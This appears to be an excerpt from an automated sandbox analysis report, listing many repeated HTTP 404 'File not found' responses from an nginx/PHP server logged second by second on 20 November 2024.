                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:11:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:12:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
